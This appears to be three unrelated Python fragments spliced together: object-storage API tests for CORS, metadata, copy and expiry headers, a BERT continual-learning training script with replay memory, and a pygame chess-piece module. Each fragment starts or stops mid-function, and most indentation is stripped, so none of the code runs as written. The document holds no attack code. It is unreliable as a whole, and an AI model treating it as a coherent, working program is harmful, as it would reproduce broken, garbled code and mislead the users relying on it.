self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
object_headers = {'Access-Control-Request-Method': 'GET'}
object_info = generate_object(container_name, object_name,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with Access-Control-Request-Method header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'Access-Control-Request-Method',
response.headers,
msg="Access-Control-Request-Method header was set")
expected = 'GET'
received = response.headers.get('Access-Control-Request-Method')
self.assertEqual(
expected,
received,
msg='object created with Access-Control-Request-Method header'
' value expected: {0} received: {1}'.format(
expected,
received))
@data_driven_test(ObjectDatasetList())
@ObjectStorageFixture.required_features('object-cors')
def ddtest_object_retrieval_with_origin(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
headers = {'access-control-allow-origin': 'http://example.com',
'access-control-expose-headers': 'X-Trans-Id'}
generate_object(container_name, object_name, headers=headers)
headers = {'Origin': 'http://example.com'}
response = self.client.get_object_metadata(
container_name, object_name, headers=headers)
self.assertIn(
'access-control-expose-headers',
response.headers,
msg="access-control-expose-headers header should be set")
self.assertIn(
'access-control-allow-origin',
response.headers,
msg="access-control-allow-origin header should be set")
expected = 'http://example.com'
received = response.headers.get('access-control-allow-origin')
self.assertEqual(
expected,
received,
msg='access-control-allow-origin header should reflect origin'
' expected: {0} received: {1}'.format(expected, received))
@data_driven_test(ObjectDatasetList(exclude=['dlo', 'slo']))
def ddtest_object_creation_with_file_compression(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
def object_data_op(data, extra_data):
data = zlib.compress(data)
return (data, extra_data)
object_headers = {'Content-Encoding': 'gzip'}
object_info = generate_object(container_name, object_name,
data_op=object_data_op,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with Content-Encoding header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'Content-Encoding',
response.headers,
msg="Content-Encoding header was set")
expected = 'gzip'
received = response.headers.get('Content-Encoding')
self.assertEqual(
expected,
received,
msg='object created with Content-Encoding header value'
' expected: {0} received: {1}'.format(expected, received))
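# Note: zlib.compress() produces zlib-format data rather than a true gzip
# stream; the test above only verifies that the Content-Encoding header
# round-trips. If a genuine gzip payload were required, a sketch (an
# assumption, not part of the original suite) would be:
#
#     import gzip
#     def object_data_op(data, extra_data):
#         return (gzip.compress(data), extra_data)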
@data_driven_test(ObjectDatasetList())
def ddtest_object_creation_with_content_disposition(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
object_headers = {
'Content-Disposition': 'attachment; filename=testdata.txt'}
object_info = generate_object(container_name, object_name,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with content disposition header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'Content-Disposition',
response.headers,
msg="Content-Disposition header was set")
expected = 'attachment; filename=testdata.txt'
received = response.headers.get('Content-Disposition')
self.assertEqual(
expected,
received,
msg='object created with Content-Disposition header value'
' expected: {0} received: {1}'.format(expected, received))
@data_driven_test(ObjectDatasetList())
def ddtest_object_creation_with_x_delete_at(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
start_time = calendar.timegm(time.gmtime())
future_time = str(int(start_time + 60))
object_headers = {'X-Delete-At': future_time}
object_info = generate_object(container_name, object_name,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with X-Delete-At header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'X-Delete-At',
response.headers,
msg="X-Delete-At header was set")
expected = future_time
received = response.headers.get('X-Delete-At')
self.assertEqual(
expected,
received,
msg='object created with X-Delete-At header value'
' expected: {0} received: {1}'.format(expected, received))
@data_driven_test(ObjectDatasetList())
def ddtest_object_creation_with_delete_after(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
object_headers = {'X-Delete-After': '60'}
object_info = generate_object(container_name, object_name,
headers=object_headers)
response = object_info.get('response')
method = 'object creation with X-Delete-After header'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'X-Delete-At',
response.headers,
msg="X-Delete-At header was set")
@data_driven_test(ObjectDatasetList())
@ObjectStorageFixture.required_features('object_versioning')
def ddtest_versioned_container_creation_with_valid_data(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_history_container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
headers = {'X-Versions-Location': object_history_container_name}
self.client.set_container_metadata(container_name, headers=headers)
# list objects in non-current container
response = self.client.list_objects(
object_history_container_name)
method = 'list on empty versioned container'
expected = 204
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
# Create an object (version 1)
object_name = self.default_obj_name
ver1_info = generate_object(container_name, object_name)
response = ver1_info.get('response')
method = 'object version one creation'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
# Update an object (version 2)
object_name = self.default_obj_name
ver2_info = generate_object(container_name, object_name)
response = ver2_info.get('response')
method = 'update version one object'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.list_objects(object_history_container_name)
method = 'list on versioned container'
expected = 200
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
@unittest.skip("Problem with this test's assertion, needs review")
@data_driven_test(ObjectDatasetList())
def ddtest_put_copy_object(self, object_type, generate_object):
src_container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
dest_container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
src_object_name = '{0}_source'.format(self.default_obj_name)
generate_object(src_container_name, src_object_name)
dest_obj_name = '{0}_destination'.format(self.default_obj_name)
source = '/{0}/{1}'.format(src_container_name, src_object_name)
hdrs = {'X-Copy-From': source, 'Content-Length': '0'}
response = self.client.copy_object(
dest_container_name,
dest_obj_name,
headers=hdrs)
method = 'put copy object'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object(
dest_container_name,
dest_obj_name)
method = 'copied object retrieval'
expected = 200
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
@data_driven_test(ObjectDatasetList())
def ddtest_copy_object(self, object_type, generate_object):
src_container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
dest_container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
src_object_name = '{0}_source'.format(self.default_obj_name)
generate_object(src_container_name, src_object_name)
dest_object_name = '{0}_destination'.format(self.default_obj_name)
dest = '/{0}/{1}'.format(dest_container_name, dest_object_name)
headers = {'Destination': dest}
response = self.client.copy_object(
src_container_name,
src_object_name,
headers=headers)
method = 'copy object'
expected = 201
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object(
dest_container_name,
dest_object_name)
method = 'copied object retrieval'
expected = 200
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
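    # Hedged sketch: the two copy flavours exercised above differ only in
    # which side names the other. PUT with X-Copy-From is issued against the
    # destination and points back at the source; COPY with Destination is
    # issued against the source and points at the destination. The helper
    # name is illustrative, not part of the original suite.
    @staticmethod
    def _copy_headers(container_name, object_name, via_put=True):
        path = '/{0}/{1}'.format(container_name, object_name)
        if via_put:
            return {'X-Copy-From': path, 'Content-Length': '0'}
        return {'Destination': path}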
@data_driven_test(ObjectDatasetList())
def ddtest_object_deletion_with_valid_object(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
generate_object(container_name, object_name)
response = self.client.delete_object(
container_name,
object_name)
method = 'delete object'
expected = 204
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object(
container_name,
self.default_obj_name)
method = 'object retrieval'
expected = 404
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
@data_driven_test(ObjectDatasetList())
def ddtest_obj_metadata_update_with_object_possessing_metadata(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
generate_object(container_name, object_name,
headers={'X-Object-Meta-Grok': 'Drok'})
response = self.client.get_object_metadata(
container_name, object_name)
self.assertIn(
'X-Object-Meta-Grok',
response.headers,
msg="object not created with X-Object-Meta-Grok header")
expected = 'Drok'
received = response.headers.get('X-Object-Meta-Grok')
self.assertEqual(
expected,
received,
msg='object created with X-Object-Meta-Grok header value'
' expected: {0} received: {1}'.format(expected, received))
headers = {'X-Object-Meta-Foo': 'Bar'}
response = self.client.set_object_metadata(
container_name,
self.default_obj_name,
headers=headers)
method = 'set object metadata'
expected = 202
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'X-Object-Meta-Foo',
response.headers,
msg="object updated with X-Object-Meta-Foo header")
expected = 'Bar'
received = response.headers.get('X-Object-Meta-Foo')
self.assertEqual(
expected,
received,
msg='object X-Object-Meta-Foo header value expected: {0}'
' received: {1}'.format(expected, received))
@data_driven_test(ObjectDatasetList())
def ddtest_obj_metadata_update(self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object_name = self.default_obj_name
generate_object(container_name, object_name)
headers = {'X-Object-Meta-Grok': 'Drok'}
response = self.client.set_object_metadata(
container_name, object_name, headers=headers)
method = 'set object metadata X-Object-Meta-Grok: Drok'
expected = 202
received = response.status_code
self.assertEqual(
expected,
received,
msg=STATUS_CODE_MSG.format(
method=method,
expected=expected,
received=str(received)))
response = self.client.get_object_metadata(
container_name,
self.default_obj_name)
self.assertIn(
'X-Object-Meta-Grok',
response.headers,
msg="object updated with X-Object-Meta-Grok header")
expected = 'Drok'
received = response.headers.get('X-Object-Meta-Grok')
self.assertEqual(
expected,
received,
msg='object X-Object-Meta-Grok header value expected: {0}'
' received: {1}'.format(expected, received))
@data_driven_test(ObjectDatasetList())
def ddtest_content_type_not_detected_without_detect_content_type_header(
self, object_type, generate_object):
container_name = self.create_temp_container(
descriptor=CONTAINER_DESCRIPTOR)
object1_name = 'object1.txt'
object1_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
generate_object(container_name, object1_name, headers=object1_headers)
object2_name = 'object2.txt'
object2_headers = {'X-Detect-Content-Type': False,
'Content-Type': 'application/x-www-form-urlencoded'}
        generate_object(container_name, object2_name, headers=object2_headers)
import os
import argparse
from copy import deepcopy
DATA_DIR = '../data'
parser = argparse.ArgumentParser()
parser.add_argument("--seed", type=int, default=0)
parser.add_argument("--epochs", nargs='+', type=int, default=[10, 10, 10, 10, 10],
help='Epoch number for each task')
parser.add_argument("--batch_size", type=int, default=8,
help='training batch size')
parser.add_argument("--bert_learning_rate", type=float, default=3e-5,
help='learning rate for pretrained Bert')
parser.add_argument("--learning_rate", type=float, default=3e-5,
help='learning rate for Class Classifier/General Space Encoder/Specific Space Encoder')
parser.add_argument("--task_learning_rate", type=float, default=5e-4,
help='learning rate for Task ID Classifier')
parser.add_argument("--replay_freq", type=int, default=10,
help='frequency of replaying, i.e. replay one batch from memory'
' every replay_freq batches')
# NOTE: argparse's type=bool treats any non-empty string as True, so
# "--kmeans False" on the command line still enables the flag; a str2bool
# helper or action='store_true' would behave as expected.
parser.add_argument('--kmeans', type=bool, default=False,
                    help='whether to apply KMeans when choosing examples to store')
parser.add_argument("--dump", type=bool, default=False,
help='dump the model or not')
parser.add_argument('--gpu', default='0', type=str,
help='id(s) for CUDA_VISIBLE_DEVICES')
parser.add_argument('--n-labeled', type=int, default=2000,
help='Number of training data for each class')
parser.add_argument('--n-val', type=int, default=2000,
help='Number of validation data for each class')
parser.add_argument("--nspcoe", type=float, default=1.0,
help='Coefficient for Next Sentence Prediction Loss')
parser.add_argument("--tskcoe", type=float, default=1.0,
help='Coefficient for task ID Prediction Loss')
parser.add_argument("--disen", type=bool, default=False,
help='Apply Information Disentanglement or not')
parser.add_argument("--hidden_size", type=int, default=128,
help='size of General/Specific Space')
parser.add_argument("--model_path", type=str, default="./dump",
help='where to dump the model')
parser.add_argument("--reg", type=bool, default=False,
help='Apply Regularization or Not')
parser.add_argument("--regcoe", type=float, default=0.5,
help='Regularization Coefficient when not replaying')
parser.add_argument("--regcoe_rply", type=float, default=5.0,
help='Regularization Coefficient when replaying')
parser.add_argument("--reggen", type=float, default=0.5,
help='Regularization Coefficient on General Space')
parser.add_argument("--regspe", type=float, default=0.5,
help='Regularization Coefficient on Specific Space')
parser.add_argument("--store_ratio", type=float, default=0.01,
help='how many samples to store for replaying')
parser.add_argument('--tasks', nargs='+', type=str,
default=['ag', 'yelp', 'amazon', 'yahoo', 'dbpedia'], help='Task Sequence')
parser.add_argument('--select_best', nargs='+', type=bool,
default=[True, True, True, True, True],
help='whether picking the model with best val acc on each task')
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
import numpy as np
import torch
from tqdm import tqdm
from transformers import AdamW, get_constant_schedule_with_warmup
from sklearn.cluster import KMeans, MiniBatchKMeans
from model import Model, Predictor
from read_data import compute_class_offsets, prepare_dataloaders
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
args.device = device
n_gpu = torch.cuda.device_count()
dataset_classes = {
'amazon' : 5,
'yelp' : 5,
'yahoo' : 10,
'ag' : 4,
'dbpedia' : 14,
}
class Memory(object):
def __init__(self):
self.examples = []
self.masks = []
self.labels = []
self.tasks = []
self.features = []
def append(self, example, mask, label, task):
self.examples.append(example)
self.masks.append(mask)
self.labels.append(label)
self.tasks.append(task)
def store_features(self, model):
"""
Args:
model: The model trained just after previous task
Returns: None
store previous features before trained on new class
"""
self.features = []
length = len(self.labels)
model.eval()
with torch.no_grad():
for i in range(length):
x = torch.tensor(self.examples[i]).view(1, -1).to(device)
mask = torch.tensor(self.masks[i]).view(1, -1).to(device)
g_fea, s_fea, _, _, _ = model(x, mask)
fea = torch.cat([g_fea, s_fea], dim=1).view(-1).data.cpu().numpy()
self.features.append(fea)
print(len(self.features))
print(len(self.labels))
def get_random_batch(self, batch_size, task_id=None):
if task_id is None:
permutations = np.random.permutation(len(self.labels))
index = permutations[:batch_size]
mini_examples = [self.examples[i] for i in index]
mini_masks = [self.masks[i] for i in index]
mini_labels = [self.labels[i] for i in index]
mini_tasks = [self.tasks[i] for i in index]
mini_features = [self.features[i] for i in index]
else:
index = [i for i in range(len(self.labels)) if self.tasks[i] == task_id]
np.random.shuffle(index)
index = index[:batch_size]
mini_examples = [self.examples[i] for i in index]
mini_masks = [self.masks[i] for i in index]
mini_labels = [self.labels[i] for i in index]
mini_tasks = [self.tasks[i] for i in index]
mini_features = [self.features[i] for i in index]
return torch.tensor(mini_examples), torch.tensor(mini_masks), torch.tensor(mini_labels), \
torch.tensor(mini_tasks), torch.tensor(mini_features)
def get_minibatch(self, batch_size):
length = len(self.labels)
permutations = np.random.permutation(length)
for s in range(0, length, batch_size):
if s + batch_size >= length:
break
index = permutations[s:s + batch_size]
mini_examples = [self.examples[i] for i in index]
mini_masks = [self.masks[i] for i in index]
mini_labels = [self.labels[i] for i in index]
mini_tasks = [self.tasks[i] for i in index]
mini_features = [self.features[i] for i in index]
yield torch.tensor(mini_examples), torch.tensor(mini_masks), torch.tensor(mini_labels), \
torch.tensor(mini_tasks), torch.tensor(mini_features)
def __len__(self):
return len(self.labels)
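# Hedged usage sketch for the replay buffer above, not called by the training
# loop. Token ids, masks and the feature size are illustrative; features are
# filled by hand because store_features() needs a trained model.
def _memory_demo():
    buf = Memory()
    for i in range(4):
        buf.append([101, 7, 8, 102, 0], [1, 1, 1, 1, 0], label=i % 2, task=0)
        buf.features.append(np.zeros(2 * args.hidden_size, dtype=np.float32))
    x, mask, y, t, fea = buf.get_random_batch(batch_size=2)
    return x.shape, fea.shape  # (2, 5) and (2, 2 * args.hidden_size)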
def random_seq(src):
#adding [SEP] to unify the format of samples for NSP
batch_size = src.size(0)
length = src.size(1)
dst = []
for i in range(batch_size):
cur = src[i]
first_pad = (cur.tolist() + [0]).index(0)
cur = cur[1:first_pad].tolist()
cur = random_string(cur)
padding = [0] * (length - len(cur) - 1)
dst.append(torch.tensor([101] + cur + padding))
return torch.stack(dst).to(device)
def random_string(tokens):
    #randomly split a positive sample into two halves and add [SEP] between them
    tokens.remove(102)
    tokens.remove(102)
    len1 = len(tokens)
    if len1 == 1:
        cut = 1
    else:
        cut = np.random.randint(1, len1)
    tokens = tokens[:cut] + [102] + tokens[cut:] + [102]
    return tokens
def change_string(tokens):
    #create negative samples for NSP by randomly splitting a positive sample
    #and swapping the two halves
    tokens.remove(102)
    tokens.remove(102)
    len1 = len(tokens)
    if len1 == 1:
        cut = 1
    else:
        cut = np.random.randint(1, len1)
    tokens = tokens[cut:] + [102] + tokens[:cut] + [102]
    return tokens
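# Hedged toy example of the two NSP sample builders above; token ids are
# illustrative (101 = [CLS] is re-added by the caller, 102 = [SEP]).
# random_string keeps the two halves in order (positive pair), change_string
# swaps them (negative pair). Not called anywhere in the script.
def _nsp_demo():
    pos = random_string([3, 4, 102, 5, 6, 102])  # e.g. [3, 102, 4, 5, 6, 102]
    neg = change_string([3, 4, 102, 5, 6, 102])  # e.g. [5, 6, 102, 3, 4, 102]
    return pos, neg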
def get_permutation_batch(src, src_mask):
#create negative samples for Next Sentence Prediction
batch_size = src.size(0)
length = src.size(1)
dst = []
dst_mask = []
lbl = []
for i in range(batch_size):
cur = src[i]
mask = src_mask[i].tolist()
first_pad = (cur.tolist() + [0]).index(0)
cur = cur[1:first_pad].tolist()
cur = change_string(cur)
lbl.append(1)
padding = [0] * (length - len(cur) - 1)
dst.append(torch.tensor([101] + cur + padding))
dst_mask.append(torch.tensor(mask))
return torch.stack(dst).to(device), torch.stack(dst_mask).to(device), torch.tensor(lbl).to(device)
def train_step(model, optimizer, nsp_CR, cls_CR, x, mask, y, t, task_id, replay,
x_feature, predictor, optimizer_P, scheduler, scheduler_P):
batch_size = x.size(0)
model.train()
predictor.train()
model.zero_grad()
predictor.zero_grad()
x = random_seq(x)
pre_lbl = None
# If Next Sentence Prediction is added, augment the training data with permuted data
if args.disen:
p_x, p_mask, p_lbl = get_permutation_batch(x, mask)
x = torch.cat([x, p_x], dim=0)
mask = torch.cat([mask, p_mask], dim=0)
r_lbl = torch.zeros_like(p_lbl)
nsp_lbl = torch.cat([r_lbl, p_lbl], dim=0)
y = torch.cat([y, y], dim=0)
t = torch.cat([t, t], dim=0)
total_g_fea, total_s_fea, cls_pred, task_pred, _ = model(x, mask)
if args.disen:
g_fea = total_g_fea[:batch_size, :]
s_fea = total_s_fea[:batch_size, :]
else:
g_fea = total_g_fea
s_fea = total_s_fea
# Calculate classification loss
_, pred_cls = cls_pred.max(1)
correct_cls = pred_cls.eq(y.view_as(pred_cls)).sum().item()
cls_loss = cls_CR(cls_pred, y)
task_loss = torch.tensor(0.0).to(device)
reg_loss = torch.tensor(0.0).to(device)
nsp_loss = torch.tensor(0.0).to(device)
# Calculate regularization loss
if x_feature is not None and args.reg is True:
fea_len = g_fea.size(1)
g_fea = g_fea[:batch_size, :]
s_fea = s_fea[:batch_size, :]
old_g_fea = x_feature[:, :fea_len]
old_s_fea = x_feature[:, fea_len:]
reg_loss += args.regspe * torch.nn.functional.mse_loss(s_fea, old_s_fea) + \
args.reggen * torch.nn.functional.mse_loss(g_fea, old_g_fea)
if replay and task_id > 0:
reg_loss *= args.regcoe_rply
elif not replay and task_id > 0:
reg_loss *= args.regcoe
elif task_id == 0:
reg_loss *= 0.0 #no reg loss on the 1st task
# Calculate task loss only when in replay batch
task_pred = task_pred[:, :task_id + 1]
_, pred_task = task_pred.max(1)
correct_task = pred_task.eq(t.view_as(pred_task)).sum().item()
if task_id > 0 and replay:
task_loss += args.tskcoe * cls_CR(task_pred, t)
# Calculate Next Sentence Prediction loss
nsp_acc = 0.0
if args.disen:
nsp_output = predictor(total_g_fea)
nsp_loss += args.nspcoe * nsp_CR(nsp_output, nsp_lbl)
_, nsp_pred = nsp_output.max(1)
nsp_correct = nsp_pred.eq(nsp_lbl.view_as(nsp_pred)).sum().item()
nsp_acc = nsp_correct * 1.0 / (batch_size * 2.0)
loss = cls_loss + task_loss + reg_loss + nsp_loss
loss.backward()
optimizer.step()
scheduler.step()
if args.disen:
optimizer_P.step()
scheduler_P.step()
return nsp_acc, correct_cls, correct_task, nsp_loss.item(), task_loss.item(), cls_loss.item(), reg_loss.item()
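# Hedged summary of the regularization-scaling branches inside train_step,
# pulled out for readability; illustrative only, not called by the loop.
def _reg_scale(task_id, replay):
    if task_id == 0:
        return 0.0  # no reg loss on the 1st task
    return args.regcoe_rply if replay else args.regcoe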
def validation(model, t, validation_loaders):
model.eval()
acc_list = []
with torch.no_grad():
avg_acc = 0.0
for i in range(t + 1):
valid_loader = validation_loaders[i]
total = 0
correct = 0
for x, mask, y in valid_loader:
x, mask, y = x.to(device), mask.to(device), y.to(device)
batch_size = x.size(0)
g_fea, s_fea, cls_pred, _, _ = model(x, mask)
_, pred_cls = cls_pred.max(1)
correct += pred_cls.eq(y.view_as(pred_cls)).sum().item()
total += batch_size
print("acc on task {} : {}".format(i, correct * 100.0 / total))
avg_acc += correct * 100.0 / total
acc_list.append(correct * 100.0 / total)
return avg_acc / (t + 1), acc_list
def select_samples_to_store(model, buffer, data_loader, task_id):
### ----------- add examples to memory ------------------ ##
x_list = []
mask_list = []
y_list = []
fea_list = []
model.eval()
with torch.no_grad():
for x, mask, y in data_loader:
x = x.to(device)
mask = mask.to(device)
y = y.to(device)
_, _, _, _, bert_emb = model(x, mask)
x_list.append(x.to("cpu"))
mask_list.append(mask.to("cpu"))
y_list.append(y.to("cpu"))
# Kmeans on bert embedding
fea_list.append(bert_emb.to("cpu"))
x_list = torch.cat(x_list, dim=0).data.cpu().numpy()
mask_list = torch.cat(mask_list, dim=0).data.cpu().numpy()
y_list = torch.cat(y_list, dim=0).data.cpu().numpy()
fea_list = torch.cat(fea_list, dim=0).data.cpu().numpy()
# if use KMeans
if args.kmeans:
n_clu = int(args.store_ratio * len(x_list))
estimator = KMeans(n_clusters=n_clu, random_state=args.seed)
estimator.fit(fea_list)
label_pred = estimator.labels_
centroids = estimator.cluster_centers_
for clu_id in range(n_clu):
index = [i for i in range(len(label_pred)) if label_pred[i] == clu_id]
closest = float("inf")
closest_x = None
closest_mask = None
closest_y = None
for j in index:
dis = np.sqrt(np.sum(np.square(centroids[clu_id] - fea_list[j])))
if dis < closest:
closest_x = x_list[j]
closest_mask = mask_list[j]
closest_y = y_list[j]
                    closest = dis
import pygame
from pygame.locals import *
class Piece():
def __init__(self, window, board_start, tile_size, value, team, image, origin):
self.value = value
self.window = window
self.board_start = board_start
self.tile_size = tile_size
self.team = team
self.image = image
self.origin = origin
self.moves = []
self.taken = False
def render(self):
if not self.taken:
self.window.blit(self.image, self.pos)
def send_to_origin(self, board_start, tile_size):
self.tile = self.origin
self.pos = [board_start[0] + tile_size * self.tile[0] + self.offset[0],
board_start[1] + tile_size * self.tile[1] + self.offset[1]]
    def taken(self):
        #unreachable: shadowed by the `self.taken` flag assigned in __init__
        pass
def get_team(self):
return self.team
def get_piece(self):
return self.piece
def get_tile(self):
return self.tile
def get_never_moved(self):
return self.never_moved
def set_taken(self, taken):
self.taken = taken
def set_tile(self, tile):
self.tile = tile
self.pos = [self.board_start[0] + self.tile_size * self.tile[0] + self.offset[0],
self.board_start[1] + self.tile_size * self.tile[1] + self.offset[1]]
#-------------------------------------------------------------------------------------------------------------------
class King(Piece):
def __init__(self, window, board_start, tile_size, team, scale_factor, ratio, origin):
image = pygame.image.load("assets\{}{}.png".format(team, "King"))
image = pygame.transform.scale(image, (int(scale_factor * ratio), int(scale_factor)))
self.offset = [tile_size * 0.25, tile_size * 0.1]
self.piece = "King"
self.never_moved = True
super().__init__(window, board_start, tile_size, 9999, team, image, origin)
def get_moves(self, board_state):
self.moves = []
possibilities = [[1,1], [0,1], [-1,1], [-1,0], [-1,-1], [0,-1], [1,-1], [1,0]]
for i in range(8):
tile = [self.tile[0] + possibilities[i][0], self.tile[1] + possibilities[i][1]]
if tile[0] <= 7 and tile[0] >= 0 and tile[1] <= 7 and tile[1] >= 0:
if board_state[tile[0]][tile[1]] == 0:
self.moves.append(tile)
elif board_state[tile[0]][tile[1]].get_team() != self.team:
self.moves.append(tile)
#Castling
if self.never_moved:
if self.team == "white":
#King side
if board_state[7][7] != 0:
if (board_state[7][7].get_piece() == "Rook" and board_state[7][7].get_never_moved() and
board_state[6][7] == 0 and board_state[5][7] == 0):
self.moves.append([7, 7])
#Queen side
if board_state[0][7] != 0:
if (board_state[0][7].get_piece() == "Rook" and board_state[0][7].get_never_moved() and
board_state[1][7] == 0 and board_state[2][7] == 0 and board_state[3][7] == 0):
self.moves.append([0, 7])
elif self.team == "black":
#King side
if board_state[7][0] != 0:
if (board_state[7][0].get_piece() == "Rook" and board_state[7][0].get_never_moved() and
board_state[6][0] == 0 and board_state[5][0] == 0):
self.moves.append([7, 0])
#Queen side
if board_state[0][0] != 0:
if (board_state[0][0].get_piece() == "Rook" and board_state[0][0].get_never_moved() and
board_state[1][0] == 0 and board_state[2][0] == 0 and board_state[3][0] == 0):
self.moves.append([0, 0])
return self.moves
def move(self, tile, clicked_state, board_state, pieces):
#Castling
if clicked_state != 0 and clicked_state.get_piece() == "Rook":
#King's Side
if tile[0] == 7:
clicked_state.move([tile[0] - 2, tile[1]], clicked_state, board_state, pieces)
self.tile = [tile[0] - 1, tile[1]]
#Queen's Side
elif tile[0] == 0:
clicked_state.move([tile[0] + 3, tile[1]], clicked_state, board_state, pieces)
self.tile = [tile[0] + 2, tile[1]]
else:
board_state[tile[0]][tile[1]] = self
board_state[self.tile[0]][self.tile[1]] = 0
#Taking an enemy piece
if clicked_state != 0 and clicked_state.get_team() != self.team:
clicked_state.set_taken(True)
self.tile = tile
self.never_moved = False
self.pos = [self.board_start[0] + self.tile_size * self.tile[0] + self.offset[0],
self.board_start[1] + self.tile_size * self.tile[1] + self.offset[1]]
return board_state, pieces
def get_never_moved(self):
return self.never_moved
#-------------------------------------------------------------------------------------------------------------------
class Queen(Piece):
def __init__(self, window, board_start, tile_size, team, scale_factor, ratio, origin):
image = pygame.image.load("assets\{}{}.png".format(team, "Queen"))
image = pygame.transform.scale(image, (int(scale_factor * ratio), int(scale_factor)))
self.offset = [tile_size * 0.25, tile_size * 0.1]
self.piece = "Queen"
super().__init__(window, board_start, tile_size, 9, team, image, origin)
def get_moves(self, board_state):
self.moves = []
directions = [[0, 1], [0, -1], [1, 0], [-1, 0], [1, 1], [-1, 1], [1, -1], [-1, -1]]
for direction in directions:
tile = [self.tile[0] + direction[0], self.tile[1] + direction[1]]
broken = False
while tile[0] <= 7 and tile[0] >= 0 and tile[1] <= 7 and tile[1] >= 0 and not broken:
if board_state[tile[0]][tile[1]] == 0:
self.moves.append(tile)
elif board_state[tile[0]][tile[1]].get_team() != self.team:
self.moves.append(tile)
broken = True
else:
broken = True
tile = [tile[0] + direction[0], tile[1] + direction[1]]
return self.moves
def move(self, tile, clicked_state, board_state, pieces):
board_state[tile[0]][tile[1]] = self
board_state[self.tile[0]][self.tile[1]] = 0
#Taking an enemy piece
if clicked_state != 0 and clicked_state.get_team() != self.team:
clicked_state.set_taken(True)
self.tile = tile
self.pos = [self.board_start[0] + self.tile_size * self.tile[0] + self.offset[0],
self.board_start[1] + self.tile_size * self.tile[1] + self.offset[1]]
return board_state, pieces
#-------------------------------------------------------------------------------------------------------------------
class Bishop(Piece):
def __init__(self, window, board_start, tile_size, team, scale_factor, ratio, origin):
image = pygame.image.load("assets\{}{}.png".format(team, "Bishop"))
image = pygame.transform.scale(image, (int(scale_factor * ratio * 0.9), int(scale_factor * 0.9)))
self.offset = [tile_size * 0.275, tile_size * 0.15]
self.piece = "Bishop"
super().__init__(window, board_start, tile_size, 3, team, image, origin)
def get_moves(self, board_state):
self.moves = []
directions = [[1, 1], [-1, 1], [1, -1], [-1, -1]]
for direction in directions:
tile = [self.tile[0] + direction[0], self.tile[1] + direction[1]]
broken = False
